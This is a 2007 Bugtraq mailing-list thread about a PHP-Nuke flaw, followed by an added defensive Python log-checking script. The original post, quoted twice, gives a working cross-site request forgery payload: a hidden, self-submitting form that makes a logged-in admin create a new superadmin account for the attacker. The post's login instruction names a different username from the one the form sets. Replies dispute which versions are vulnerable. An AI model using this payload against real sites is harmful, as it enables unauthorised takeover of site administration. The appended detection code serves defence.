Re: PHP-Nuke add admin ALL Versions

2007-09-22 Thread Blaine Elzey
Nuke 8 produces this page output, hence not vulnerable.

Posting from another server not allowed!

~ Blaine

----- Original Message -----
From: [EMAIL PROTECTED]
To: bugtraq@securityfocus.com
Sent: Thursday, September 20, 2007 12:46:41 PM (GMT-0500) America/New_York
Subject: PHP-Nuke add admin ALL Versions

Paste this code into an HTML page then link it to victim (victim must be admin)

iframe name=aiuto frameborder=0 height=0 width=0/iframe
FORM name=Faiuto ACTION=http://VICTIMURL/nuke/admin.php; 
target=aiuto METHOD=POST
input type=hidden NAME=add_name value=ATTACKER
input type=hidden NAME=add_aid value=ATTACKER
input type=hidden NAME=add_email value=[EMAIL PROTECTED]
input type=hidden NAME=add_url value=YOURSITE
input type=hidden NAME=add_admlanguage value=italian
input type=hidden NAME=add_radminsuper value=1
input type=hidden NAME=add_pwd value=YOURPASSWORD
input type=hidden NAME=op value=AddAuthor
input type=image height=0 width=0
/FORMSCRIPTdocument.Faiuto.submit()/SCRIPT 

You are admin now ;)

Then you can log into phpnuke with user HACKER and pass YOURPASSWORD...



Re: PHP-Nuke add admin ALL Versions

2007-09-21 Thread n0de
I can reproduce this vulnerability just in old versions of php-nuke. Is this 
right?

n0de


Re: Re: PHP-Nuke add admin ALL Versions

2007-09-21 Thread h3llcode
Yeah, all versions of phpnuke are vulnerable ...

Regards.

Seph1roth


PHP-Nuke add admin ALL Versions

2007-09-20 Thread h3llcode
Paste this code into an HTML page then link it to victim (victim must be admin)

iframe name=aiuto frameborder=0 height=0 width=0/iframe
FORM name=Faiuto ACTION=http://VICTIMURL/nuke/admin.php; 
target=aiuto METHOD=POST
input type=hidden NAME=add_name value=ATTACKER
input type=hidden NAME=add_aid value=ATTACKER
input type=hidden NAME=add_email value=[EMAIL PROTECTED]
input type=hidden NAME=add_url value=YOURSITE
input type=hidden NAME=add_admlanguage value=italian
input type=hidden NAME=add_radminsuper value=1
input type=hidden NAME=add_pwd value=YOURPASSWORD
input type=hidden NAME=op value=AddAuthor
input type=image height=0 width=0
/FORMSCRIPTdocument.Faiuto.submit()/SCRIPT 

You are admin now ;)

Then you can log into phpnuke with user HACKER and pass YOURPASSWORD...
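
Added example (not part of any message in this thread, and not PHP-Nuke code): a log check for the cross-site POST to admin.php that the thread describes, built on the same Referer signal as the Nuke 8 "Posting from another server not allowed!" response. It assumes Apache/nginx "combined" access logs; the function names, the site host nuke.example.org and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def referer_verdict(referer, site_hosts):
    """Classify a Referer header as 'same-site', 'cross-site' or 'missing'."""
    if referer in ("", "-"):
        return "missing"
    # Compare the parsed hostname exactly; a substring test would accept
    # look-alike hosts such as nuke.example.org.other.example.net.
    host = (urlsplit(referer).hostname or "").lower()
    return "same-site" if host in site_hosts else "cross-site"

def flag_admin_posts(lines, site_hosts, admin_script="/admin.php"):
    """Return (timestamp, ip, verdict, referer) for each POST to the admin
    script whose Referer is not one of the site's own hosts."""
    hosts = {h.lower() for h in site_hosts}
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not urlsplit(m["path"]).path.endswith(admin_script):
            continue
        verdict = referer_verdict(m["referer"], hosts)
        if verdict != "same-site":
            findings.append((m["ts"], m["ip"], verdict, m["referer"]))
    return findings

# Constructed sample log lines (documentation IPs and example domains).
_T = '192.0.2.10 - - [21/Sep/2007:10:1%d:00 +0000] "%s HTTP/1.1" 200 512 "%s" "Mozilla/5.0"'
SAMPLE_LOG = [
    _T % (1, "POST /nuke/admin.php", "http://nuke.example.org/nuke/admin.php"),
    _T % (2, "POST /nuke/admin.php", "http://other.example.net/page.html"),
    _T % (3, "POST /nuke/admin.php", "http://nuke.example.org.other.example.net/"),
    _T % (4, "POST /nuke/admin.php", "-"),
    _T % (5, "GET /nuke/admin.php", "http://other.example.net/page.html"),
    _T % (6, "POST /nuke/modules.php", "http://other.example.net/page.html"),
]

if __name__ == "__main__":
    for finding in flag_admin_posts(SAMPLE_LOG, ["nuke.example.org"]):
        print(finding)
```

A missing Referer is reported separately from a cross-site one because proxies and privacy settings can strip the header from legitimate requests. For the same reason a Referer check is only a partial control, and a per-session token in the admin forms is the more robust fix.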